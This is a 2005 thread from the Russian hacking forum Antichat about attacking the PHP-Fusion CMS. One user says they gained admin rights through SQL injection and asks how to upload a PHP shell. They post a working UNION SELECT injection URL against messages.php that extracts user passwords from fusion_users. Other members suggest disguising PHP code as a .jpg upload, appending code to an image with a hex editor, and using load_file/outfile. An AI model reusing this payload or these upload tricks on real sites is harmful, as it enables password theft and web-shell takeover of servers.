HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Sql инъекция в движке php_fusion
  #1  
Старый 06.12.2005, 20:45
ilyha
Познающий
Регистрация: 10.11.2005
Сообщений: 75
С нами: 10789409

Репутация: 4
Arrow Sql инъекция в движке php_fusion

Ну вообщем работает тема. Стал админом, а дальше, как php файл на сервер загрузить, через админ панель и функцию аплоада вайлов не получается, пишет, что формат не тот, загружает эта функция в папку downloads, а в ней содержатся, архивы, максимум изображения. Так как пхп туда запхнуть???
Заранее спасибо!!!
 
Ответить с цитированием

  #2  
Старый 06.12.2005, 20:53
Rebz
Флудер
Регистрация: 08.11.2004
Сообщений: 3,395
С нами: 11317286

Репутация: 3876


По умолчанию

что значит "работает тема"?
Почему ты назвал тему "Sql инъекция в движке php_fusion".. и нигде про эту инъекцию не упоминаешь?! Гм.. а вопрос вообще спрашиваешь как туда залить шелл..
 
Ответить с цитированием

  #3  
Старый 06.12.2005, 21:01
ilyha
Познающий
Регистрация: 10.11.2005
Сообщений: 75
С нами: 10789409

Репутация: 4
По умолчанию

messages.php?folder=inbox&show=H'%20union%20select %201,1,1,user_password,1,1 ,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 ,1,1+from+fusion_users/*

Иньекция после "messages.php?folder=inbox&show=" - имеет место быть! Вообщем да, вопрос не в этом, а втом, как туда залить PHP файлик?
 
Ответить с цитированием

  #4  
Старый 06.12.2005, 21:07
ghostwizard
Участник форума
Регистрация: 04.12.2005
Сообщений: 202
С нами: 10754840

Репутация: 99
По умолчанию

попробуй file.php.jpg, потом обратись usl/file.php.... но не факт что сработает из-за ограничения на исполнение в папке, так или иначе попробуй... если руганется на недопустимый тип файлов, то в руки hex-editor, добавляешь в конец *.jpg(gif,... etc) свой код и сохраняешь.
 
Ответить с цитированием

  #5  
Старый 06.12.2005, 21:07
k1b0rg
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
С нами: 10937126

Репутация: 1316


По умолчанию

load_file
outfile
 
Ответить с цитированием

  #6  
Старый 06.12.2005, 21:21
limpompo
Познавший АНТИЧАТ
Регистрация: 27.08.2005
Сообщений: 1,662
С нами: 10897046

Репутация: 1329


По умолчанию

dams baga rulez...
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.